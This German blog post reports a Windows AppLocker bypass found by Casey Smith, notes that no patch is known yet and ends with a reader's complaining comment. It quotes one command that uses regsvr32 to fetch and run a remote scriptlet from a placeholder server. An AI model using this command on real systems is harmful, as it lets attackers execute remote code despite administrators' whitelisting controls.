Eine Sicherheitslücke in Windows lässt sich ausnutzen, um von Administratoren gesetzte AppLocker-Ausführungsregeln für Anwendungen zu umgehen.
Anzeige
In Windows 7 und Windows Server 2008 R2 wurde die Funktion AppLocker vorgestellt. Unter Windows 7 ist diese nur in der Ultinate- und Enterprise-Variante nutzbar. Mit AppLocker können Administratoren Regeln festlegen, um Benutzern das Installieren oder Nutzen von Software zu erlauben oder zu verbieten.
Das Ganze ist aber nicht so ganz kollateralschädenfrei. Bereits im Artikel Was schützt vor Locky und anderer Ransomware? hatte ich auf den Hotfix KB2532445 (You can circumvent AppLocker rules by using an Office macro on a computer that is running Windows 7 or Windows Server 2008 R2) verwiesen, der eine Lücke in Office abdecken soll.
Jetzt ist Casey Smith aus Colorade per Zufall auf eine weitere Sicherheitslücke in AppLocker gestoßen, die er in diesem Blog-Beitrag dokumentiert hat. Mit einem einfachen Befehl:
regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
Anzeige
gelang es ihm, AppLocker auszuhebeln. Offenbar ist regsvr32 in den AppLocker-Anwendungsregeln in einer WhiteList enthalten. Ob eine Blockade des Befehls zu Windows-Funktionseinbußen führt, ist unklar. Bisher gibt es wohl keinen Patch, der die Lücke abdichtet. Hier findet sich ein Tweet, wo Device Guard als Lösung ausgeführt wird. Eine ausführlichere Betrachtung des Themas findet sich in diesem Artikel (englisch). (via)
Anzeige
Wie üblich: UNVERSTANDENES Zeux wird wiedergekäut!
Korrektur siehe
http://news.softpedia.com/news/windows-applocker-bypass-allows-attackers-to-registers-dlls-off-the-internet-503289.shtml